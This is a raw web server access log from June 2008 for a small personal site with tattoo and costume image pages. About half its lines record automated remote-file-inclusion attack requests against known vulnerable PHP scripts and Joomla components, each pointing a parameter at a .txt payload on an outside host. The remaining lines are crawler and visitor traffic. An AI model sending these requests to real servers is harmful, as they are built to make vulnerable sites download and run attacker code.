72.55.153.109 - - [12/Jun/2008:11:36:30 -0500] "GET /logs/db.php?path_local=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
72.55.153.109 - - [12/Jun/2008:11:36:30 -0500] "GET /db.php?path_local=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 290 "-""libwww-perl/5.810"
69.19.14.33 - - [12/Jun/2008:11:36:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://images.google.com/images?gbv=2&ndsp=21&hl=en&q=tattoo+flash&start=567&sa=N""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.19.14.33 - - [12/Jun/2008:11:37:35 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 32768 "http://images.google.com/images?gbv=2&ndsp=21&hl=en&q=tattoo+flash&start=609&sa=N""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
189.129.32.158 - - [12/Jun/2008:11:39:26 -0500] "GET /logs/errors.php?eror=http://loveyou-love.t35.com/sistem.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
189.129.32.158 - - [12/Jun/2008:11:39:27 -0500] "GET /errors.php?eror=http://loveyou-love.t35.com/sistem.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.72.144.18 - - [12/Jun/2008:11:41:58 -0500] "GET /logs/errors.php?eror=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.72.144.18 - - [12/Jun/2008:11:41:59 -0500] "GET /errors.php?eror=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.36.222.34 - - [12/Jun/2008:11:45:54 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:11:45:54 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
195.12.53.176 - - [12/Jun/2008:11:52:25 -0500] "GET //errors.php?error=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
204.11.238.210 - - [12/Jun/2008:11:53:57 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
204.11.238.210 - - [12/Jun/2008:11:54:01 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
72.36.222.34 - - [12/Jun/2008:11:57:07 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:11:57:07 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
206.221.179.200 - - [12/Jun/2008:11:58:34 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
206.221.179.200 - - [12/Jun/2008:11:58:34 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.36.222.34 - - [12/Jun/2008:12:04:38 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:12:04:38 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
212.34.140.215 - - [12/Jun/2008:12:07:47 -0500] "GET /logs//errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
212.34.140.215 - - [12/Jun/2008:12:07:48 -0500] "GET //errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
87.106.101.24 - - [12/Jun/2008:12:10:17 -0500] "GET /logs//errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jun/2008:12:10:19 -0500] "GET //errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
206.221.179.200 - - [12/Jun/2008:12:19:13 -0500] "GET /htheader.php?include_once=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
74.6.22.89 - - [12/Jun/2008:12:24:39 -0500] "GET /logs/access_log.1173139200 HTTP/1.0" 200 149256 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.89 - - [12/Jun/2008:12:24:39 -0500] "GET /logs/access_log.1176163200 HTTP/1.0" 200 230264 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.89 - - [12/Jun/2008:12:24:39 -0500] "GET /logs/access_log.1196467200 HTTP/1.0" 200 198259 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.149.254.30 - - [12/Jun/2008:12:24:58 -0500] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
89.149.254.30 - - [12/Jun/2008:12:24:58 -0500] "GET /logs/access_log.1207353600/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
89.149.254.30 - - [12/Jun/2008:12:25:04 -0500] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
205.205.28.133 - - [12/Jun/2008:12:25:57 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
205.205.28.133 - - [12/Jun/2008:12:25:57 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
85.17.6.7 - - [12/Jun/2008:12:26:12 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
85.17.6.7 - - [12/Jun/2008:12:26:13 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
216.6.233.125 - - [12/Jun/2008:12:28:27 -0500] "GET /logs/access_log.1203552000/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.811"
216.6.233.125 - - [12/Jun/2008:12:28:27 -0500] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
216.6.233.125 - - [12/Jun/2008:12:28:28 -0500] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
202.221.143.111 - - [12/Jun/2008:12:29:51 -0500] "GET /logs//errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
202.221.143.111 - - [12/Jun/2008:12:29:52 -0500] "GET //errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
72.55.153.109 - - [12/Jun/2008:12:34:50 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
72.55.153.109 - - [12/Jun/2008:12:34:54 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
69.210.185.1 - - [12/Jun/2008:12:36:31 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
69.210.185.1 - - [12/Jun/2008:12:36:32 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
82.102.10.211 - - [12/Jun/2008:12:38:46 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:12:38:47 -0500] "GET //config/dbutil.bck.php?confdir=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
72.55.153.109 - - [12/Jun/2008:12:39:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.55.153.109 - - [12/Jun/2008:12:39:40 -0500] "GET //skin/zero_vote/error.php?dir=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
74.53.196.178 - - [12/Jun/2008:12:44:35 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
74.53.196.178 - - [12/Jun/2008:12:44:35 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
195.12.53.176 - - [12/Jun/2008:12:49:45 -0500] "GET //login.php?dir=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
202.179.180.41 - - [12/Jun/2008:12:51:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.41 - - [12/Jun/2008:12:51:17 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
65.55.208.135 - - [12/Jun/2008:12:51:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [12/Jun/2008:12:51:18 -0500] "GET /logs/access_log.1202860800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.34.140.215 - - [12/Jun/2008:12:52:09 -0500] "GET /logs//login.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.34.140.215 - - [12/Jun/2008:12:52:09 -0500] "GET //login.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
83.222.4.128 - - [12/Jun/2008:12:53:56 -0500] "GET /logs/access_log.1182038400/index.php?go=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
83.222.4.128 - - [12/Jun/2008:12:53:57 -0500] "GET /index.php?go=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
83.222.4.128 - - [12/Jun/2008:12:53:57 -0500] "GET /logs/index.php?go=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.102.10.211 - - [12/Jun/2008:12:54:03 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:12:54:03 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
83.222.4.128 - - [12/Jun/2008:12:54:04 -0500] "GET /logs/access_log.1188777600/index.php?go=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
74.6.22.89 - - [12/Jun/2008:12:59:24 -0500] "GET /logs/access_log.1176768000 HTTP/1.0" 200 270912 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.70.144.89 - - [12/Jun/2008:13:04:05 -0500] "GET /logs/access_log.1208649600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
217.70.144.89 - - [12/Jun/2008:13:04:05 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
217.70.144.89 - - [12/Jun/2008:13:04:05 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
74.6.22.89 - - [12/Jun/2008:13:06:18 -0500] "GET /logs/access_log.1164326400 HTTP/1.0" 200 141792 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.12.53.176 - - [12/Jun/2008:13:10:16 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 333 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
65.55.208.119 - - [12/Jun/2008:13:15:22 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
204.11.238.210 - - [12/Jun/2008:13:16:09 -0500] "GET /logs/access_log.1204156800//modules/Neos_Chronos/header.php?base_folder=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
65.55.208.119 - - [12/Jun/2008:13:16:10 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
204.11.238.210 - - [12/Jun/2008:13:16:16 -0500] "GET /logs/access_log.1208649600//modules/Neos_Chronos/header.php?base_folder=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
212.67.202.19 - - [12/Jun/2008:13:18:19 -0500] "GET /logs/paymenow.inc.php?config[root_dir]=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.68"
212.67.202.19 - - [12/Jun/2008:13:18:20 -0500] "GET /paymenow.inc.php?config[root_dir]=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.68"
65.55.208.124 - - [12/Jun/2008:13:27:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [12/Jun/2008:13:27:03 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.101.24 - - [12/Jun/2008:13:27:16 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jun/2008:13:27:18 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
80.154.38.121 - - [12/Jun/2008:13:27:36 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
65.214.45.147 - - [12/Jun/2008:13:28:25 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.147 - - [12/Jun/2008:13:28:26 -0500] "GET /rachel%20study/rachel%20saint.htm HTTP/1.0" 200 2291 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
80.82.215.11 - - [12/Jun/2008:13:36:00 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tripiwarez.eu/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
80.82.215.11 - - [12/Jun/2008:13:36:00 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tripiwarez.eu/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.25.182.178 - - [12/Jun/2008:13:38:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?hl=en&rls=GGLR,GGLR:2005-38,GGLR:en&q=old+school+tattoo+flash&start=70&sa=N""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
72.25.182.178 - - [12/Jun/2008:13:38:32 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
72.25.182.178 - - [12/Jun/2008:13:38:32 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
72.25.182.178 - - [12/Jun/2008:13:38:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
67.15.8.80 - - [12/Jun/2008:13:45:03 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xisonex/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
67.15.8.80 - - [12/Jun/2008:13:45:03 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xisonex/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
82.102.10.211 - - [12/Jun/2008:13:50:13 -0500] "GET /logs/access_log.1204156800//Neos_Chronos/header.php?base_folder=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:13:50:55 -0500] "GET /logs/access_log.1208649600//Neos_Chronos/header.php?base_folder=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
65.55.208.132 - - [12/Jun/2008:13:59:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [12/Jun/2008:13:59:32 -0500] "GET /costume/thmb5.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.221.143.111 - - [12/Jun/2008:14:02:10 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
202.221.143.111 - - [12/Jun/2008:14:02:11 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
85.207.154.226 - - [12/Jun/2008:14:10:54 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://gotika.webpark.cz/cesky/X_01_01.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008060309 Firefox/2.0.0.11; MEGAUPLOAD 1.0; Alexa toolbar"
85.207.154.226 - - [12/Jun/2008:14:10:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008060309 Firefox/2.0.0.11; MEGAUPLOAD 1.0; Alexa toolbar"
85.207.154.226 - - [12/Jun/2008:14:10:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008060309 Firefox/2.0.0.11; MEGAUPLOAD 1.0; Alexa toolbar"
71.143.5.157 - - [12/Jun/2008:14:17:39 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:40 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:40 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:50 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:50 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:50 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:50 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:51 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:51 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:52 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:52 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:53 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:55 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:17:55 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:50 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:51 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:51 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:51 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:51 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:52 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
71.143.5.157 - - [12/Jun/2008:14:18:53 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
